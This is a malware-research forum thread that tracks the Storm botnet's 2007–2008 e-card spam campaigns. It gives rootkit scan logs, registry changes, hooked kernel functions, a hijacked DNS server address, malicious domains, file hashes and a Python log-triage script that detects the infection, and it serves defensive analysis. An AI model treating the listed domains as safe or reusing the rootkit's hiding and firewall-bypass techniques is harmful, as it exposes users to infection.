Rise of the Greeting Cards
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Kimberly
Here we go folks, the Storm botnet is hitting the news again. First reports arrived on Xmas Eve.

http://isc.sans.org/diary.html?storyid=3778
http://isc.sans.org/diary.html?storyid=3784

Since then new variants and new domains have been reported daily. Average detection isn't too bad considering that their hashes and sizes may change every 30 minutes.

<h4>
merrychristmasdude.com - stripshow.exe
</h4>
HijackThis log.

O4 - HKCU\..\Run: [disnisa] C:\WINDOWS\disnisa.exe

Registry changes.

Grants itself access when using the XP firewall and modifies the settings related to the synchronization of Internet Time.

QUOTE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\disnisa.exe"
Type: REG_SZ
Data: C:\WINDOWS\disnisa.exe:*:Enabled:enable
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters "NtpServer"
Old type: REG_SZ
New type: REG_SZ
Old data: time.windows.com,0x1
New data: time.windows.com,time.nist.gov
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters "Type"
Old type: REG_SZ
New type: REG_SZ
Old data: NoSync
New data: NTP

<h4>
uhavepostcard.com - happy2008.exe
</h4>
Same changes as above, but this time I did end up with a copy of the trojan in each folder on the HDD.

QUOTE
c:\_install.exe
c:\Program Files\_install.exe
c:\Program Files\AutoIt3\_install.exe
Date: 12/25/2007 3:54 PM
Size: 133,633 bytes
c:\Program Files\AutoIt3\Aut2Exe\_install.exe
Date: 12/25/2007 3:54 PM
Size: 133,633 bytes
c:\Program Files\AutoIt3\Extras\Exe2Aut\_install.exe
Date: 12/25/2007 3:54 PM
Size: 133,633 bytes
c:\Program Files\AutoIt3\Extras\SQLite\_install.exe
Date: 12/25/2007 3:54 PM
Size: 133,633 bytes

etc ....
The bugger also changed my DNS servers.

QUOTE
O17 - HKLM\System\CCS\Services\Tcpip\..\{0EA144BD-B0FA-4739-9823-B30B93C67B52}: NameServer = 86.64.145.140
O17 - HKLM\System\CCS\Services\Tcpip\..\{65ADB1E0-9F61-4345-A07F-FB5A49913656}: NameServer = 86.64.145.140
O17 - HKLM\System\CCS\Services\Tcpip\..\{7F1821CA-77FA-4148-A4C4-BC3F2763587A}: NameServer = 86.64.145.140
O17 - HKLM\System\CS1\Services\Tcpip\..\{0EA144BD-B0FA-4739-9823-B30B93C67B52}: NameServer = 86.64.145.140
Those two versions don't have any rootkit components but if you leave them running for a while they are able to download additional malware on the computer.
You may get an antivirus killer and beep.sys might be replaced on the computer. This version is particularly difficult to clean as beep.sys prevents the running of certain cleaning tools.

<h4>
happycards2008.com - happy-2008.exe
</h4>
Rootkit Scan.

QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\system32\clean767c-5b3b.sys ZwEnumerateKey [0xF5B84920]
SSDT \??\C:\WINDOWS\system32\clean767c-5b3b.sys ZwEnumerateValueKey [0xF5B84A9E]
SSDT \??\C:\WINDOWS\system32\clean767c-5b3b.sys ZwQueryDirectoryFile [0xF5B845D6]

---- Devices - GMER 1.0.14 ----

AttachedDevice \Driver\Tcpip \Device\Ip clean767c-5b3b.sys
AttachedDevice \Driver\Tcpip \Device\Tcp clean767c-5b3b.sys
AttachedDevice \Driver\Tcpip \Device\Udp clean767c-5b3b.sys
AttachedDevice \Driver\Tcpip \Device\RawIp clean767c-5b3b.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\clean767c-5b3b.sys (*** hidden *** ) [AUTO] clean767c-5b3b

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanmgr.exe
Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanmgr.exe@0 0x00 0x00 0x28 0x0A ...
Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanmgr.exe@1 0x1E 0x09 0x9B 0xF1 ...
Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanri.exe
Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanri.exe@0 0x00 0x00 0x28 0x0A ...
Reg HKLM\SYSTEM\CurrentControlSet\Control\Nls\MUILanguages\RCV2\cleanri.exe@1 0xDA 0x95 0xCD 0xBB ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b@ImagePath \??\C:\WINDOWS\system32\clean767c-5b3b.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b@DisplayName clean767c-5b3b
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\clean767c-5b3b\Security@Security 0x01 0x00 0x14 0x80 ...
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanmgr.exe
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanmgr.exe@0 0x00 0x00 0x28 0x0A ...
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanmgr.exe@1 0x1E 0x09 0x9B 0xF1 ...
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanri.exe
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanri.exe@0 0x00 0x00 0x28 0x0A ...
Reg HKLM\SYSTEM\ControlSet002\Control\Nls\MUILanguages\RCV2\cleanri.exe@1 0xDA 0x95 0xCD 0xBB ...
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\VcCleanUp.exe
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\VcCleanUp.exe@ C:\PROGRA~1\COMMON~1\SYMANT~1\LiveReg\VCCLEA~1.EXE
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath@ %SystemRoot%\system32\cleanmgr.exe /D %c
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@ {A9B48EAC-3ED8-11d2-8216-00C04FB687DA}
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@PropertyBag {24400D16-5754-11d2-8218-00C04FB687DA}
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@FileList *.*
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@Folder ?:\Catalog.wci
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@Flags 321
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Content Indexer Cleaner@Priority 300
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Branding@QuietUninstallString Rundll32 IedkCS32.dll,BrandCleanInstallStubs
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Cleanup.dll
Reg HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Cleanup.dll@CheckAppHelp 1
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup@ ComCacheCleanup 1.0 Object
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup\CLSID
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup\CLSID@ {F7A4F1DA-96C3-4BCF-BEB3-1D9FFDE89EE9}
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup\CurVer
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup\CurVer@ NODEMGR.ComCacheCleanup.1
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup.1
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup.1@ ComCacheCleanup 1.0 Object
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup.1\CLSID
Reg HKLM\SOFTWARE\Classes\NODEMGR.ComCacheCleanup.1\CLSID@ {F7A4F1DA-96C3-4BCF-BEB3-1D9FFDE89EE9}
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer@CleanShutdown 0
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz@Last used time 0x30 0xE4 0x7B 0xC4 ...
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz@Days between clean up 60
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz@NoRun 1
Reg HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache@@shell32.dll,-22026 Disk Cleanup

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\dllcache\cleanmgr.exe 64000 bytes
File C:\WINDOWS\system32\clean.config 24345 bytes
File C:\WINDOWS\system32\clean767c-5b3b.sys 129664 bytes
File C:\WINDOWS\system32\cleanmgr.exe 64000 bytes

---- EOF - GMER 1.0.14 ----
This version hides files and registry entries starting with "clean". The service and the sys file are partially random.
clean[random 4 letters / numbers]-[random 4 letters / numbers].

<h4>
newyearcards2008.com - happy-2008.exe
</h4>
Rootkit Scan.

QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\system32\bldy6d83-68c9.sys ZwEnumerateKey [0xF5B84920]
SSDT \??\C:\WINDOWS\system32\bldy6d83-68c9.sys ZwEnumerateValueKey [0xF5B84A9C]
SSDT \??\C:\WINDOWS\system32\bldy6d83-68c9.sys ZwQueryDirectoryFile [0xF5B845D8]

---- Devices - GMER 1.0.14 ----

AttachedDevice \Driver\Tcpip \Device\Ip bldy6d83-68c9.sys
AttachedDevice \Driver\Tcpip \Device\Tcp bldy6d83-68c9.sys
AttachedDevice \Driver\Tcpip \Device\Udp bldy6d83-68c9.sys
AttachedDevice \Driver\Tcpip \Device\RawIp bldy6d83-68c9.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\bldy6d83-68c9.sys (*** hidden *** ) [AUTO] bldy6d83-68c9 <-- ROOTKIT !!!

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9@ImagePath \??\C:\WINDOWS\system32\bldy6d83-68c9.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9@DisplayName bldy6d83-68c9
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\bldy6d83-68c9\Security@Security 0x01 0x00 0x14 0x80 ...

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\bldy.config 37379 bytes
File C:\WINDOWS\system32\bldy6d83-68c9.sys 129664 bytes <-- ROOTKIT !!!

---- EOF - GMER 1.0.14 ----
bldy[random 4 letters / numbers]-[random 4 letters / numbers]

<h4>
newyearwithlove.com - happynewyear2008.exe
</h4>
Rootkit Scan.

QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\system32\ortyeras4790-21bc.sys ZwEnumerateKey [0xF5BA7890]
SSDT \??\C:\WINDOWS\system32\ortyeras4790-21bc.sys ZwEnumerateValueKey [0xF5BA7A1C]
SSDT \??\C:\WINDOWS\system32\ortyeras4790-21bc.sys ZwQueryDirectoryFile [0xF5BA7578]

---- Devices - GMER 1.0.14 ----

AttachedDevice \Driver\Tcpip \Device\Ip ortyeras4790-21bc.sys
AttachedDevice \Driver\Tcpip \Device\Tcp ortyeras4790-21bc.sys
AttachedDevice \Driver\Tcpip \Device\Udp ortyeras4790-21bc.sys
AttachedDevice \Driver\Tcpip \Device\RawIp ortyeras4790-21bc.sys

Device \Driver\SYMTDI \Device\SymTDI ortyeras4790-21bc.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\ortyeras4790-21bc.sys (*** hidden *** ) [AUTO] ortyeras4790-21bc

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc@ImagePath \??\C:\WINDOWS\system32\ortyeras4790-21bc.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc@DisplayName ortyeras4790-21bc
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\ortyeras4790-21bc\Security@Security 0x01 0x00 0x14 0x80 ...

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\ortyeras.config 40563 bytes
File C:\WINDOWS\system32\ortyeras4790-21bc.sys 129536 bytes

---- EOF - GMER 1.0.14 ----
ortyeras[random 4 letters / numbers]-[random 4 letters / numbers]

<h4>
familypostcards2008.com - happynewyear2008.exe / freshcards2008.com - happynewyear2008.exe
</h4>
Rootkit Scan.

QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\system32\kalleny30c8-4459.sys ZwEnumerateKey [0xF5B8586E]
SSDT \??\C:\WINDOWS\system32\kalleny30c8-4459.sys ZwEnumerateValueKey [0xF5B859F4]
SSDT \??\C:\WINDOWS\system32\kalleny30c8-4459.sys ZwQueryDirectoryFile [0xF5B85560]

---- Devices - GMER 1.0.14 ----

AttachedDevice \Driver\Tcpip \Device\Ip kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\Tcp kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\Udp kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\RawIp kalleny30c8-4459.sys

Device \Driver\SYMTDI \Device\SymTDI kalleny30c8-4459.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\kalleny30c8-4459.sys (*** hidden *** ) [AUTO] kalleny30c8-4459

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459@ImagePath \??\C:\WINDOWS\system32\kalleny30c8-4459.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459@DisplayName kalleny30c8-4459
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\kalleny30c8-4459\Security@Security 0x01 0x00 0x14 0x80 ...

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\kalleny.config 41250 bytes
File C:\WINDOWS\system32\kalleny30c8-4459.sys 131200 bytes

---- EOF - GMER 1.0.14 ----
kalleny[random 4 letters / numbers]-[random 4 letters / numbers]

<h4>
Notes
</h4>
I left a couple of entries out of the GMER scan which are related to the firewall. If you have an eagle eye, you'll be able to spot the evolution for yourself.
In the 3 last versions, one can see that the rootkit "intercepts" the firewall filtering.

Clean PC.

QUOTE
---- Devices - GMER 1.0.14 ----

AttachedDevice \FileSystem\Ntfs \Ntfs SYMEVENT.SYS (Symantec Event Library/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
Rootkit installed.

QUOTE
---- Devices - GMER 1.0.14 ----

AttachedDevice \FileSystem\Ntfs \Ntfs SYMEVENT.SYS (Symantec Event Library/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Ip kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Udp kalleny30c8-4459.sys
AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\RawIp kalleny30c8-4459.sys

Device \Driver\SYMTDI \Device\SymTDI kalleny30c8-4459.sys
SymTDI is the Norton Internet Security filter; the driver has been replaced by the rootkit.

Summary.
  • Arrives normally as an email attachment (may arrive from drive-by downloads too).
  • Searches for email addresses by enumerating files with certain extensions. This is a typical behavior of mass-mailers and spam-bots.
    QUOTE
    ADB - ASP - CFG - CGI - DBX - DHTM - EML - HTM - HTML - INI - JSP - MBX - MDX - MHT - MMF - MSG - NCH - NFO - ODS - OFT - PHP - PL - PP - SHT - SHTM - STM - TBB - TXT - UIN - WAB - WSH - XLS - XML
  • Able to send out email message(s) with the built-in SMTP client engine.
  • Has a built-in peer-to-peer client. The list of peers is encoded into %System%\[driver name].config
    Sample:
    CODE
    [config]
    [local]
    uport=6902
    [peers]
    00003D6C8F338A3FDD3DF3648666F55C=185E494E272400
    0100A634122F3553A046EC451061927C=29F8415B46AC00
    02007E238D780D25FD5511285E2E596E=29F905AC789000
    03001E62DC533E7AF6161729A953891B=29F932FE26E400
    0400EB5EC13599373A3D544A2D6AF94F=29FA2158703000
    etc ...
  • Kernel Mode driver. %System%\[driver name][random 4 letters / numbers]-[random 4 letters / numbers].sys
  • Code is injected into the legitimate services.exe process in order to bypass firewalls.
Note:
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).


Network activity.

disnisa.exe variant.

Request for internet access by the executable itself.

Rootkit variant.

Request for internet access by services.exe.

Once allowed or bypassed ... hell breaks loose. Welcome to the Storm botnet.

The bugger exhausted my DSL connection immediately, the disnisa variant simply blew out my internet connection due to the high amount of incoming and outgoing requests.

Now, consider whether you really need that outbound UDP traffic above 1024. I personally deny all and make exceptions for legitimate cases on a per-application basis. If you can achieve & manage such a lockdown, you won't be communicating with the rest of your New (Year) friends even if infected.

Happy holidays to all and watch out when you open your greeting cards. Please don't end up stripped down to the bone.
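As an added example (not code from the thread, and not part of GMER or HijackThis), here is a small Python triage pass over the kind of lines quoted in this post: HijackThis O4/O17 entries and the GMER SSDT, AttachedDevice, Device and Service sections. It flags the visible signs the post describes: a Run entry pointing at an executable dropped straight into the Windows folder, a NameServer that is not the expected resolver, SSDT hooks, hidden services, a non-allowlisted filter attached to the TCP/IP devices, the SymTDI device being served by something other than Symantec's driver, and any name that fits the `prefix[4 alnum]-[4 alnum]` pattern noted under each scan. The sample log is constructed from lines copied out of this thread plus one benign Java entry for contrast; the expected-resolver and known-filter allowlists are assumptions for the example, not values from the thread.

```python
import re

# Constructed sample: lines copied from the HijackThis and GMER excerpts in this
# thread (disnisa.exe and kalleny30c8-4459.sys variants), plus one benign O4 line.
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.6.0\bin\jusched.exe
O4 - HKCU\..\Run: [disnisa] C:\WINDOWS\disnisa.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{0EA144BD-B0FA-4739-9823-B30B93C67B52}: NameServer = 86.64.145.140
SSDT \??\C:\WINDOWS\system32\kalleny30c8-4459.sys ZwEnumerateKey [0xF5B8586E]
SSDT \??\C:\WINDOWS\system32\kalleny30c8-4459.sys ZwQueryDirectoryFile [0xF5B85560]
AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Norton Internet Security Filter/Symantec Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp kalleny30c8-4459.sys
Device \Driver\SYMTDI \Device\SymTDI kalleny30c8-4459.sys
Service C:\WINDOWS\system32\kalleny30c8-4459.sys (*** hidden *** ) [AUTO] kalleny30c8-4459
File C:\WINDOWS\system32\kalleny.config 41250 bytes
"""

# Assumed allowlists for this example: the resolver the host should be using and
# the TDI filter drivers that legitimately attach to \Driver\Tcpip on this box.
EXPECTED_DNS = {"192.168.1.1"}
KNOWN_TCPIP_FILTERS = {"symtdi.sys"}

# Service / driver names in the thread follow <word><4 alnum>-<4 alnum>.
GENERATED_NAME = re.compile(r"^[a-z]+[0-9a-z]{4}-[0-9a-z]{4}$", re.IGNORECASE)

RUN_ENTRY = re.compile(r"^O4 - .*?\[(?P<name>[^\]]+)\] (?P<path>C:\\WINDOWS\\[^\\ ]+\.exe)$", re.IGNORECASE)
NAMESERVER = re.compile(r"^O17 - .*NameServer = (?P<ip>[\d.]+)")
SSDT_HOOK = re.compile(r"^SSDT \\\?\?\\(?P<path>\S+) (?P<func>Zw\w+)")
HIDDEN_SERVICE = re.compile(r"^Service (?P<path>\S+) \(\*\*\* hidden \*\*\* \) \[(?P<start>\w+)\] (?P<name>\S+)")
ATTACHED = re.compile(r"^AttachedDevice \\Driver\\Tcpip (?P<device>\S+) (?P<driver>\S+)")
SYMTDI = re.compile(r"^Device \\Driver\\SYMTDI \\Device\\SymTDI (?P<driver>\S+)")


def basename(path):
    return path.rsplit("\\", 1)[-1]


def is_generated(name):
    """True if a file/service name fits the random-suffix pattern seen in the thread."""
    stem = name.lower()
    if stem.endswith(".sys"):
        stem = stem[:-4]
    return bool(GENERATED_NAME.match(stem))


def triage(log_text):
    """Return a list of (finding, details...) tuples for the suspicious lines."""
    findings = []
    for raw in log_text.splitlines():
        line = raw.strip()
        m = RUN_ENTRY.match(line)
        if m:  # executable dropped directly into %windir% and autostarted
            findings.append(("run_entry_in_windir", m["name"], m["path"]))
            continue
        m = NAMESERVER.match(line)
        if m and m["ip"] not in EXPECTED_DNS:
            findings.append(("dns_changed", m["ip"]))
            continue
        m = SSDT_HOOK.match(line)
        if m:  # any SSDT entry pointing into a third-party driver is worth a look
            findings.append(("ssdt_hook", basename(m["path"]), m["func"]))
            continue
        m = HIDDEN_SERVICE.match(line)
        if m:
            findings.append(("hidden_service", m["name"], m["start"]))
            continue
        m = SYMTDI.match(line)
        if m and m["driver"].lower() != "symtdi.sys":
            findings.append(("symtdi_replaced", m["driver"]))
            continue
        m = ATTACHED.match(line)
        if m and m["driver"].lower() not in KNOWN_TCPIP_FILTERS:
            findings.append(("tcpip_filter", m["device"], m["driver"]))
    return findings


def generated_drivers(findings):
    """Names across all findings that fit the thread's random-suffix pattern."""
    names = {field.lower() for f in findings for field in f[1:] if is_generated(field)}
    return sorted(names)


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f)
    print("random-suffix names:", generated_drivers(found))
```

The allowlists are the part you would tune per machine: a second TDI filter on \Device\Tcp is not suspicious on its own, but one whose name is not on the host's known-filter list and also fits the generated-name pattern is exactly the combination the scans in this post show.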
Kimberly
New domains are showing up each hour. I'll try to keep track of them.
  1. hellosanta2008.com
  2. happy2008toyou.com
  3. hohoho2008.com
  4. happysantacards.com
  5. parentscards.com
  6. postcards-2008.com
  7. santapcards.com
  8. santawishes2008.com
See also Spamtrackers
The whole wiki article also traces back activity related to Storm and represents an interesting read.
Kimberly
<h4>
Valentine's Day
</h4>
They actually started off this campaign on the 14th January, one month before Valentine's Day.
First you get an email inviting you to read your card.

The invite simply contains an IP link now, no domains. The list of known IPs is very long and it's kinda useless to block them as they change all the time. Other subjects / phrases are:
  • Our Love Nest
  • Dream of You
  • Hugging My Pillow
  • A Toasty My Love
  • Our Love Will Last
  • When I'm With You
  • Path We Share
  • Why I Love You
  • I Love You Soo Much
  • The Dance of Love
  • ...
Webpage looks like this: [screenshot]
Rootkit Scan.

QUOTE
GMER 1.0.14.13998 - http://www.gmer.net
Rootkit scan 2008-01-29 00:41:23
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \??\C:\WINDOWS\system32\burito7107-6114.sys ZwEnumerateKey [0xF5A52800]
SSDT \??\C:\WINDOWS\system32\burito7107-6114.sys ZwEnumerateValueKey [0xF5A52984]
SSDT \??\C:\WINDOWS\system32\burito7107-6114.sys ZwQueryDirectoryFile [0xF5A524F4]

---- Devices - GMER 1.0.14 ----

AttachedDevice \Driver\Tcpip \Device\Ip burito7107-6114.sys
AttachedDevice \Driver\Tcpip \Device\Tcp burito7107-6114.sys
AttachedDevice \Driver\Tcpip \Device\Udp burito7107-6114.sys
AttachedDevice \Driver\Tcpip \Device\RawIp burito7107-6114.sys

Device \Driver\SYMTDI \Device\SymTDI burito7107-6114.sys

---- Services - GMER 1.0.14 ----

Service C:\WINDOWS\system32\burito7107-6114.sys (*** hidden *** ) [AUTO] burito7107-6114

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114@Start 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114@ImagePath \??\C:\WINDOWS\system32\burito7107-6114.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114@DisplayName burito7107-6114
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114\Security
Reg HKLM\SYSTEM\CurrentControlSet\Services\burito7107-6114\Security@Security 0x01 0x00 0x14 0x80 ...

---- Files - GMER 1.0.14 ----

File C:\WINDOWS\system32\burito.ini 39142 bytes
File C:\WINDOWS\system32\burito7107-6114.sys 129792 bytes

---- EOF - GMER 1.0.14 ----
burito[random 4 letters / numbers]-[random 4 letters / numbers]

Kimberly
Only 2 days to go before Valentine's Day. They have updated webpages and graphics. Don't visit them; there is NO download link to click on anymore. If Internet Explorer is not configured correctly you will not get the prompt and your download will start automatically.

A random image is displayed this time.
The server has eight of them.
The service and the sys file are partially random: diperto[random 4 letters / numbers]-[random 4 letters / numbers]
Kimberly
They are back to their usual ecards spam, using different subjects and messages.
Subject:
  • You have you received an ecard.
  • Check out this greeting.
  • You have yet to open your ecard.
  • Your ecard joke is waiting!
  • I've never laughed so hard!
Body:
  • Come get your personal funny postcard. You'll bust a gut!
  • Please click here to view your Crazy Funny Ecard Online
  • Come get the original Funny Card
More

Don't visit them; if Internet Explorer is not configured correctly you will not get the prompt and your download will start automatically.

The service and the sys file are partially random: diperto[random 4 letters / numbers]-[random 4 letters / numbers]

The files are rather well detected by the AV vendors.

QUOTE
File ecard.exe received on 03.03.2008 15:48:48 (CET)
Result: 22/32 (68.75%)

File diperto4e65-3398.sys received on 02.26.2008 21:39:33 (CET)
Result: 27/32 (84.38%)
Kimberly
Don't get fooled !!!
Subject:
  • Join the Laugh-A-Lot!.
  • Happy April Fools Day!
Body:
  • Happy April Fools!
  • Wise Men Have Learned More from Fools.

<h4>
Detection
</h4>
Detection is very bad right now.

File size: 139777 bytes
MD5: 79fd954809840991bf8ce487c52c5b9b
SHA1: a27033d3dbfe4b3f6a54e2e4e03830ea75513853
PEiD: -
QUOTE
File foolsday.exe received on 03.31.2008 20:00:07 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2008.4.1.0 2008.03.31 -
AntiVir 7.6.0.78 2008.03.31 TR/Crypt.XPACK.Gen
Authentium 4.93.8 2008.03.30 -
Avast 4.7.1098.0 2008.03.30 -
AVG 7.5.0.516 2008.03.31 -
